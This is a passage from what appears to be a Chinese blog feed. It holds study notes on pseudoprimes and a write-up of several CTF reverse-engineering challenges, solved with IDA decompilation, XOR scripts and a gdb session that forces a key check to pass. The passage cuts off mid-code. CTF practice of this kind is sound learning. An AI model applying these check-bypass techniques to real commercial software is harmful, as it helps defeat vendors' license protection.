素性检验</strong></h4><p><strong>知识点:</strong></p><p>1.伪素数定义(再附加个Carmicheal数)</p><p>2.欧拉伪素数定义</p><p>3.强伪素数定义</p><p><strong>要考题型:</strong></p><p>1.给一个数,利用定义判断它是不是相应的伪素数</p><p>其他要考的点,不太清楚</p>]]></content>
<summary type="html">
<p>学不动了学不动了,压抑一周了已经,心情也不好,每天水水博客找点存在感吧,呜呜呜好难过啊</p>
</summary>
<category term="Study" scheme="https://github.com/gha01un/gha01un.github.io/categories/Study/"/>
<category term="AI" scheme="https://github.com/gha01un/gha01un.github.io/tags/AI/"/>
</entry>
<entry>
<title>攻防世界高手区</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/11/24/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E9%AB%98%E6%89%8B/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/11/24/%E6%94%BB%E9%98%B2%E4%B8%96%E7%95%8C%E9%AB%98%E6%89%8B/</id>
<published>2020-11-24T07:22:22.351Z</published>
<updated>2021-01-11T01:41:52.124Z</updated>
<content type="html"><![CDATA[<h2 id="实验课写写之前做过的题叭"><a href="#实验课写写之前做过的题叭" class="headerlink" title="实验课写写之前做过的题叭"></a>实验课写写之前做过的题叭</h2><a id="more"></a><h3 id="Guess-the-Number"><a href="#Guess-the-Number" class="headerlink" title="Guess-the-Number"></a>Guess-the-Number</h3><p>下载文件,得到一个jar包,解压得到一个class文件</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/jWL524KdeCTRwni.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这个地方要用到一个反编译插件jadclipse,得到guess.class文件的源代码如下(全部)。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/kPHIT1fVEdhBmjR.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p><code>if (my_number / 5 == guess_number) {//可求得guess_number为309137378,</code></p><p>输入命令<code>java -jar guess.jar 309137378</code></p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/iKVrkQPzUdoWZXL.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="Shuffle"><a href="#Shuffle" class="headerlink" title="Shuffle"></a>Shuffle</h3><p>查看是32位文件,拖入ida查看,F5</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/o73en4NQlXJKduj.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>按R查看字符串得到flag</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/kQxyqU8Ol7Dedj3.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="re-for-50-plz-50"><a href="#re-for-50-plz-50" class="headerlink" title="re-for-50-plz-50"></a>re-for-50-plz-50</h3><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/L4R8JyFSEmslawI.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>打开ida,发现这是MIPS代码。本来准备安装RetDec,哎…还是恶补MIPS指令知识吧:<a href="https://www.cnblogs.com/thoupin/p/4018455.html" target="_blank" rel="noopener">https://www.cnblogs.com/thoupin/p/4018455.html</a></p><p>分析重点</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="C:\Users\大仑子\AppData\Roaming\Typora\typora-user-images\image-20201124150720708.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>这实际上就是一个对字符串的异或操作</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">str1 = <span class="string">'cbtcqLUBChERV[[Nh@_X^D]X_YPV[CJ'</span></span><br><span class="line"></span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> str1:</span><br><span class="line"> flag += chr(ord(i)^<span class="number">0x37</span>)</span><br><span class="line"> </span><br><span class="line">print(flag)</span><br></pre></td></tr></table></figure></div><h3 id="dmd-50"><a href="#dmd-50" class="headerlink" title="dmd-50"></a>dmd-50</h3><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/S1OKf6AX739JnDe.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>可以看到是ELF64位文件,需要在linux环境运行</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/xcFZECIYepgwrq8.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>可以看到需要输入正确的key</p><p>F5查看伪代码,发现是md5加密。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/Q2fPaKWUVp8Hxut.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>然后我们继续往下看,从if判断条件中,可以得知加密后的密文</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/CEZVzDKiBpk3mos.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>编写脚本</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/2PISa9k3FitUTbe.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="parallel-comparator-200"><a href="#parallel-comparator-200" class="headerlink" title="parallel-comparator-200"></a>parallel-comparator-200</h3><p>C文件</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdlib.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><stdio.h></span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><pthread.h></span></span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">define</span> FLAG_LEN 20</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> * <span class="title">checking</span><span class="params">(<span class="keyword">void</span> *arg)</span> </span>{</span><br><span class="line"> <span class="keyword">char</span> *result = <span class="built_in">malloc</span>(<span class="keyword">sizeof</span>(<span class="keyword">char</span>));</span><br><span class="line"> <span class="keyword">char</span> *argument = (<span class="keyword">char</span> *)arg;</span><br><span class="line"> *result = (argument[<span class="number">0</span>]+argument[<span class="number">1</span>]) ^ argument[<span class="number">2</span>];<span class="comment">//argument[0]>97</span></span><br><span class="line"> <span class="keyword">return</span> result;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">highly_optimized_parallel_comparsion</span><span class="params">(<span class="keyword">char</span> *user_string)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> initialization_number;</span><br><span class="line"> <span class="keyword">int</span> i;</span><br><span class="line"> <span class="keyword">char</span> generated_string[FLAG_LEN + <span class="number">1</span>];</span><br><span class="line"> generated_string[FLAG_LEN] = <span class="string">'\0'</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">while</span> ((initialization_number = <span class="built_in">random</span>()) >= <span class="number">64</span>);<span class="comment">//开始认为随机数且大于64,事实上为一固定数37</span></span><br><span class="line"> </span><br><span class="line"> <span class="keyword">int</span> first_letter;</span><br><span class="line"> first_letter = (initialization_number % <span class="number">26</span>) + <span class="number">97</span>;<span class="comment">//97-123</span></span><br><span class="line"></span><br><span class="line"> <span class="keyword">pthread_t</span> thread[FLAG_LEN];</span><br><span class="line"> <span class="keyword">char</span> differences[FLAG_LEN] = {<span class="number">0</span>, <span class="number">9</span>, <span class="number">-9</span>, <span class="number">-1</span>, <span class="number">13</span>, <span class="number">-13</span>, <span class="number">-4</span>, <span class="number">-11</span>, <span class="number">-9</span>, <span class="number">-1</span>, <span class="number">-7</span>, <span class="number">6</span>, <span class="number">-13</span>, <span class="number">13</span>, <span class="number">3</span>, <span class="number">9</span>, <span class="number">-13</span>, <span class="number">-11</span>, <span class="number">6</span>, <span class="number">-7</span>};</span><br><span class="line"> <span class="keyword">char</span> *arguments[<span class="number">20</span>];</span><br><span class="line"> <span class="comment">//没有全部执行,</span></span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i < FLAG_LEN; i++) {</span><br><span class="line"> arguments[i] = (<span class="keyword">char</span> *)<span class="built_in">malloc</span>(<span class="number">3</span>*<span class="keyword">sizeof</span>(<span class="keyword">char</span>));</span><br><span class="line"> arguments[i][<span class="number">0</span>] = first_letter;<span class="comment">//三个数拼接到一起 随机的</span></span><br><span class="line"> arguments[i][<span class="number">1</span>] = differences[i];<span class="comment">//固定的</span></span><br><span class="line"> arguments[i][<span class="number">2</span>] = user_string[i];<span class="comment">//输入的</span></span><br><span class="line"></span><br><span class="line"> pthread_create((<span class="keyword">pthread_t</span>*)(thread+i), <span class="literal">NULL</span>, checking, arguments[i]);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">void</span> *result;</span><br><span class="line"> <span class="keyword">int</span> just_a_string[FLAG_LEN] = {<span class="number">115</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">97</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">101</span>, <span class="number">95</span>, <span class="number">115</span>, <span class="number">116</span>, <span class="number">114</span>, <span class="number">105</span>, <span class="number">110</span>, <span class="number">103</span>, <span class="number">95</span>, <span class="number">105</span>, <span class="number">116</span>, <span class="number">95</span>, <span class="number">105</span>, <span class="number">115</span>};</span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i < FLAG_LEN; i++) {</span><br><span class="line"> pthread_join(*(thread+i), &result);</span><br><span class="line"> generated_string[i] = *(<span class="keyword">char</span> *)result + just_a_string[i];</span><br><span class="line"> <span class="built_in">free</span>(result);</span><br><span class="line"> <span class="built_in">free</span>(arguments[i]);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">int</span> is_ok = <span class="number">1</span>;</span><br><span class="line"> <span class="keyword">for</span> (i = <span class="number">0</span>; i < FLAG_LEN; i++) {</span><br><span class="line"> <span class="keyword">if</span> (generated_string[i] != just_a_string[i])</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">char</span> *user_string = (<span class="keyword">char</span> *)<span class="built_in">calloc</span>(FLAG_LEN+<span class="number">1</span>, <span class="keyword">sizeof</span>(<span class="keyword">char</span>));</span><br><span class="line"> fgets(user_string, FLAG_LEN+<span class="number">1</span>, <span class="built_in">stdin</span>);</span><br><span class="line"> <span class="keyword">int</span> is_ok = highly_optimized_parallel_comparsion(user_string);</span><br><span class="line"> <span class="keyword">if</span> (is_ok)</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"You win!\n"</span>);</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Wrong!\n"</span>);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>粗略看一遍,发现 <code>pthread_t</code> 以及<code>pthread_join</code> <code>pthread_create</code>函数看不懂,于是网上查资料,得知</p><p><code>pthread_t</code></p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="keyword">unsigned</span> __int64 <span class="keyword">uintptr_t</span></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">uintptr_t</span> <span class="keyword">pthread_t</span>;</span><br></pre></td></tr></table></figure></div><p><code>pthread_create :作用为创建新线程,如果创建成功则返回</code>0<code>,否则返回</code>error number``</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">pthread_create</span><span class="params">(<span class="keyword">pthread_t</span> *thread, <span class="keyword">const</span> <span class="keyword">pthread_attr_t</span> *attr,<span class="keyword">void</span> *(*start_routine)(<span class="keyword">void</span>*), <span class="keyword">void</span> *arg)</span></span>;</span><br></pre></td></tr></table></figure></div><ul><li><code>pthread_t *thread</code> 是线程的标识符</li><li><code>pthread_attr_t *attr</code>用来设置线程属性(如果为NULL,则为默认属性}</li><li><code>void *(*start_routine)(void*)</code> 是运行函数的起始地址</li><li><code>void *arg</code>运行函数的参数</li></ul><p><code>prhread_join : 作用为等待一个线程的结束,如果成功则返回</code>0<code>,否则返回</code>error number``</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">pthread_join</span><span class="params">(<span class="keyword">pthread_t</span> thread, <span class="keyword">void</span> **value_ptr)</span></span>;</span><br></pre></td></tr></table></figure></div><ul><li><code>pthread_t thread</code>线程标识符</li><li><code>void **value_ptr</code> 存储被等待线程的返回值</li></ul><p>有了以上知识,可以很容易可以知道user_string[20] (输入数组)的每个元素加上first_letter(经调试为固定值108),然后再与 differences[20]的元素异或,最后与just_a_string[20]的元素进行比较,用代码描述就是:</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="built_in">strcmp</span>( ( user_string[i] + first_letter ) ^ differences[i] , just_a_string[i] )</span><br></pre></td></tr></table></figure></div><p><code>脚本:</code></p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="number">1</span> a = [<span class="number">0</span>, <span class="number">9</span>, <span class="number">-9</span>, <span class="number">-1</span>, <span class="number">13</span>, <span class="number">-13</span>, <span class="number">-4</span>, <span class="number">-11</span>, <span class="number">-9</span>, <span class="number">-1</span>, <span class="number">-7</span>, <span class="number">6</span>, <span class="number">-13</span>, <span class="number">13</span>, <span class="number">3</span>, <span class="number">9</span>, <span class="number">-13</span>, <span class="number">-11</span>, <span class="number">6</span>, <span class="number">-7</span>]</span><br><span class="line"><span class="number">2</span> flag = <span class="string">''</span></span><br><span class="line"><span class="number">3</span> <span class="keyword">for</span> i <span class="keyword">in</span> range(len(a)):</span><br><span class="line"><span class="number">4</span> <span class="keyword">for</span> j <span class="keyword">in</span> range(<span class="number">127</span>):</span><br><span class="line"><span class="number">5</span> <span class="keyword">if</span> ((a[i]+<span class="number">108</span>) ^ (j+<span class="number">1</span>)) == <span class="number">0</span>:</span><br><span class="line"><span class="number">6</span> flag += chr(j+<span class="number">1</span>)</span><br><span class="line"><span class="number">7</span> <span class="keyword">break</span></span><br><span class="line"><span class="number">8</span> print(flag)</span><br></pre></td></tr></table></figure></div><h3 id="secret-galaxy-300"><a href="#secret-galaxy-300" class="headerlink" title="secret-galaxy-300"></a>secret-galaxy-300</h3><p>运行程序</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/6kehj9AW4gcxnsz.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>ida查看字符串</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/PdQ6TEwJvq9mY2j.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>动态调试,看运行后内存信息</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/sRWm3roqci15tTd.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>发现了一串字符 <strong><em>aliens_are_around_us</em></strong>提交,成功。</p><h3 id="srm-50"><a href="#srm-50" class="headerlink" title="srm-50"></a>srm-50</h3><p>exe文件</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/tgYfT96MbWqmNeU.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>运行程序,可知是 MFC 框架的对话框程序,随便输入数据,显示注册失败。IDA 静态分析 IDA 分析,找到 winmain,是 MFC 的主函数</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/bBMgTV1kHYtKeI4.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>读程序可知先是验证邮箱的合法性,然后验证 v11,可推测 flag 长度为 16,但是 v11 是 一个长度为 4 的 char 数组 CHAR v11[4],如果输入超过四位就到 v12-v23,刚好 16 个。</p><p>编写程序</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/u5Te8KsNH2hqIVi.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>得到flag</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/MHe5WSqo1z9rO4k.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="simple-check-100"><a href="#simple-check-100" class="headerlink" title="simple-check-100"></a>simple-check-100</h3><p>这道题值得记录一下,因为这道题让我第一次接触peda。</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"> <span class="number">1</span> int __cdecl main(int argc, const char **argv, const char **envp)</span><br><span class="line"> <span class="number">2</span> {</span><br><span class="line"> <span class="number">3</span> void *v3; // esp</span><br><span class="line"> <span class="number">4</span> void *v4; // esp</span><br><span class="line"> <span class="number">5</span> char *v6; // [esp+<span class="number">4</span>h] [ebp<span class="number">-44</span>h]</span><br><span class="line"> <span class="number">6</span> char v7; // [esp+<span class="number">8</span>h] [ebp<span class="number">-40</span>h]</span><br><span class="line"> <span class="number">7</span> char v8; // [esp+<span class="number">1</span>Bh] [ebp<span class="number">-2</span>Dh]</span><br><span class="line"> <span class="number">8</span> char *v9; // [esp+<span class="number">1</span>Ch] [ebp<span class="number">-2</span>Ch]</span><br><span class="line"> <span class="number">9</span> int v10; // [esp+<span class="number">20</span>h] [ebp<span class="number">-28</span>h]</span><br><span class="line"><span class="number">10</span> char v11; // [esp+<span class="number">25</span>h] [ebp<span class="number">-23</span>h]</span><br><span class="line"><span class="number">11</span> char v12; // [esp+<span class="number">26</span>h] [ebp<span class="number">-22</span>h]</span><br><span class="line"><span class="number">12</span> char v13; // [esp+<span class="number">27</span>h] [ebp<span class="number">-21</span>h]</span><br><span class="line"><span class="number">13</span> char v14; // [esp+<span class="number">28</span>h] [ebp<span class="number">-20</span>h]</span><br><span class="line"><span class="number">14</span> char v15; // [esp+<span class="number">29</span>h] [ebp<span class="number">-1</span>Fh]</span><br><span class="line"><span class="number">15</span> char v16; // [esp+<span class="number">2</span>Ah] [ebp<span class="number">-1</span>Eh]</span><br><span class="line"><span class="number">16</span> char v17; // [esp+<span class="number">2</span>Bh] [ebp<span class="number">-1</span>Dh]</span><br><span class="line"><span class="number">17</span> char v18; // [esp+<span class="number">2</span>Ch] [ebp<span class="number">-1</span>Ch]</span><br><span class="line"><span class="number">18</span> char v19; // [esp+<span class="number">2</span>Dh] [ebp<span class="number">-1</span>Bh]</span><br><span class="line"><span class="number">19</span> char v20; // [esp+<span class="number">2</span>Eh] [ebp<span class="number">-1</span>Ah]</span><br><span class="line"><span class="number">20</span> char v21; // [esp+<span class="number">2</span>Fh] [ebp<span class="number">-19</span>h]</span><br><span class="line"><span class="number">21</span> char v22; // [esp+<span class="number">30</span>h] [ebp<span class="number">-18</span>h]</span><br><span class="line"><span class="number">22</span> char v23; // [esp+<span class="number">31</span>h] [ebp<span class="number">-17</span>h]</span><br><span class="line"><span class="number">23</span> char v24; // [esp+<span class="number">32</span>h] [ebp<span class="number">-16</span>h]</span><br><span class="line"><span class="number">24</span> char v25; // [esp+<span class="number">33</span>h] [ebp<span class="number">-15</span>h]</span><br><span class="line"><span class="number">25</span> char v26; // [esp+<span class="number">34</span>h] [ebp<span class="number">-14</span>h]</span><br><span class="line"><span class="number">26</span> char v27; // [esp+<span class="number">35</span>h] [ebp<span class="number">-13</span>h]</span><br><span class="line"><span class="number">27</span> char v28; // [esp+<span class="number">36</span>h] [ebp<span class="number">-12</span>h]</span><br><span class="line"><span class="number">28</span> char v29; // [esp+<span class="number">37</span>h] [ebp<span class="number">-11</span>h]</span><br><span class="line"><span class="number">29</span> char v30; // [esp+<span class="number">38</span>h] [ebp<span class="number">-10</span>h]</span><br><span class="line"><span class="number">30</span> char v31; // [esp+<span class="number">39</span>h] [ebp-Fh]</span><br><span class="line"><span class="number">31</span> char v32; // [esp+<span class="number">3</span>Ah] [ebp-Eh]</span><br><span class="line"><span class="number">32</span> char v33; // [esp+<span class="number">3</span>Bh] [ebp-Dh]</span><br><span class="line"><span class="number">33</span> char v34; // [esp+<span class="number">3</span>Ch] [ebp-Ch]</span><br><span class="line"><span class="number">34</span> char v35; // [esp+<span class="number">3</span>Dh] [ebp-Bh]</span><br><span class="line"><span class="number">35</span> char v36; // [esp+<span class="number">3</span>Eh] [ebp-Ah]</span><br><span class="line"><span class="number">36</span> char v37; // [esp+<span class="number">3</span>Fh] [ebp<span class="number">-9</span>h]</span><br><span class="line"><span class="number">37</span> int *v38; // [esp+<span class="number">40</span>h] [ebp<span class="number">-8</span>h]</span><br><span class="line"><span class="number">38</span> </span><br><span class="line"><span class="number">39</span> v38 = &argc;</span><br><span class="line"><span class="number">40</span> __main();</span><br><span class="line"><span class="number">41</span> v8 = <span class="string">'T'</span>;</span><br><span class="line"><span class="number">42</span> v37 = <span class="number">-56</span>;</span><br><span class="line"><span class="number">43</span> v36 = <span class="number">126</span>;</span><br><span class="line"><span class="number">44</span> v35 = <span class="number">-29</span>;</span><br><span class="line"><span class="number">45</span> v34 = <span class="number">100</span>;</span><br><span class="line"><span class="number">46</span> v33 = <span class="number">-57</span>;</span><br><span class="line"><span class="number">47</span> v32 = <span class="number">22</span>;</span><br><span class="line"><span class="number">48</span> v31 = <span class="number">-102</span>;</span><br><span class="line"><span class="number">49</span> v30 = <span class="number">-51</span>;</span><br><span class="line"><span class="number">50</span> v29 = <span class="number">17</span>;</span><br><span class="line"><span class="number">51</span> v28 = <span class="number">101</span>;</span><br><span class="line"><span class="number">52</span> v27 = <span class="number">50</span>;</span><br><span class="line"><span class="number">53</span> v26 = <span class="number">45</span>;</span><br><span class="line"><span class="number">54</span> v25 = <span class="number">-29</span>;</span><br><span class="line"><span class="number">55</span> v24 = <span class="number">-45</span>;</span><br><span class="line"><span class="number">56</span> v23 = <span class="number">67</span>;</span><br><span class="line"><span class="number">57</span> v22 = <span class="number">-110</span>;</span><br><span class="line"><span class="number">58</span> v21 = <span class="number">-87</span>;</span><br><span class="line"><span class="number">59</span> v20 = <span class="number">-99</span>;</span><br><span class="line"><span class="number">60</span> v19 = <span class="number">-46</span>;</span><br><span class="line"><span class="number">61</span> v18 = <span class="number">-26</span>;</span><br><span class="line"><span class="number">62</span> v17 = <span class="number">109</span>;</span><br><span class="line"><span class="number">63</span> v16 = <span class="number">44</span>;</span><br><span class="line"><span class="number">64</span> v15 = <span class="number">-45</span>;</span><br><span class="line"><span class="number">65</span> v14 = <span class="number">-74</span>;</span><br><span class="line"><span class="number">66</span> v13 = <span class="number">-67</span>;</span><br><span class="line"><span class="number">67</span> v12 = <span class="number">-2</span>;</span><br><span class="line"><span class="number">68</span> v11 = <span class="number">106</span>;</span><br><span class="line"><span class="number">69</span> v10 = <span class="number">19</span>;</span><br><span class="line"><span class="number">70</span> v3 = alloca(<span class="number">32</span>);</span><br><span class="line"><span class="number">71</span> v4 = alloca(<span class="number">32</span>);</span><br><span class="line"><span class="number">72</span> v9 = &v7;</span><br><span class="line"><span class="number">73</span> printf(<span class="string">"Key: "</span>);</span><br><span class="line"><span class="number">74</span> v6 = v9;</span><br><span class="line"><span class="number">75</span> scanf(<span class="string">"%s"</span>, v9);</span><br><span class="line"><span class="number">76</span> <span class="keyword">if</span> ( check_key((int)v9) )</span><br><span class="line"><span class="number">77</span> interesting_function((int)&v8);</span><br><span class="line"><span class="number">78</span> <span class="keyword">else</span></span><br><span class="line"><span class="number">79</span> puts(<span class="string">"Wrong"</span>);</span><br><span class="line"><span class="number">80</span> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"><span class="number">81</span> }</span><br></pre></td></tr></table></figure></div><p>很明显只要绕过第76行代码,我们就能够获取我们需要的flag,而且v8还是已知的</p><p>将Linux下的那个文件放入Linux调试。</p><blockquote><p>task9_x86_64_46d01fe312d35ecf69c4ff8ab8ace75d080891dc</p></blockquote><p>命令</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">gdb</span><br><span class="line"></span><br><span class="line">file task9_x86_64_46d01fe312d35ecf69c4ff8ab8ace75d080891dc</span><br><span class="line"></span><br><span class="line">b main</span><br><span class="line"></span><br><span class="line">r</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/cQLeR9KnP8lzCkT.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>然后一直执行命令next,运行到check_key函数处</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/7XPICob8ZVvTAqM.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>把test eax,eax改为真就行,也就是把eax改为1。</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/7rDfO62TvRQ3NiX.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>修改eax</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PLAIN"><figure class="iseeu highlight /plain"><table><tr><td class="code"><pre><span class="line">set $eax=1</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/11/24/o9KtDjrs7e6lZ5L.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><h3 id="Mysterious"><a href="#Mysterious" class="headerlink" title="Mysterious"></a>Mysterious</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line">int __stdcall sub_401090(HWND hWnd, int a2, int a3, int a4)</span><br><span class="line">{</span><br><span class="line"> char v5; // [esp+<span class="number">50</span>h] [ebp<span class="number">-310</span>h]</span><br><span class="line"> CHAR Text[<span class="number">4</span>]; // [esp+<span class="number">154</span>h] [ebp<span class="number">-20</span>Ch]</span><br><span class="line"> char v7; // [esp+<span class="number">159</span>h] [ebp<span class="number">-207</span>h]</span><br><span class="line"> __int16 v8; // [esp+<span class="number">255</span>h] [ebp<span class="number">-10</span>Bh]</span><br><span class="line"> char v9; // [esp+<span class="number">257</span>h] [ebp<span class="number">-109</span>h]</span><br><span class="line"> int v10_108; // [esp+<span class="number">258</span>h] [ebp<span class="number">-108</span>h]</span><br><span class="line"> CHAR myinput; // [esp+<span class="number">25</span>Ch] [ebp<span class="number">-104</span>h]</span><br><span class="line"> char v11_101; // [esp+<span class="number">25</span>Fh] [ebp<span class="number">-101</span>h]</span><br><span class="line"> char v12_100; // [esp+<span class="number">260</span>h] [ebp<span class="number">-100</span>h]</span><br><span class="line"> char v13_FF; // [esp+<span class="number">261</span>h] [ebp-FFh]</span><br><span class="line"></span><br><span class="line"> memset(&myinput, <span class="number">0</span>, <span class="number">0x104</span>u);</span><br><span class="line"> v10_108 = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">if</span> ( a2 == <span class="number">16</span> )</span><br><span class="line"> {</span><br><span class="line"> DestroyWindow(hWnd);</span><br><span class="line"> PostQuitMessage(<span class="number">0</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> ( a2 == <span class="number">273</span> )</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> ( a3 == <span class="number">1000</span> )</span><br><span class="line"> {</span><br><span class="line"> GetDlgItemTextA(hWnd, <span class="number">1002</span>, &myinput, <span class="number">260</span>);</span><br><span class="line"> strlen(&myinput);</span><br><span class="line"> <span class="keyword">if</span> ( strlen(&myinput) > <span class="number">6</span> ) // 输入小于<span class="number">7</span>位</span><br><span class="line"> ExitProcess(<span class="number">0</span>);</span><br><span class="line"> v10_108 = atoi(&myinput) + <span class="number">1</span>; // int atoi(const char *nptr);是把字符串转换成整型数的一个函数。扫描nptr,如果遇到‘<span class="number">0</span><span class="number">-9</span>’之外的字符便停止。</span><br><span class="line"> // 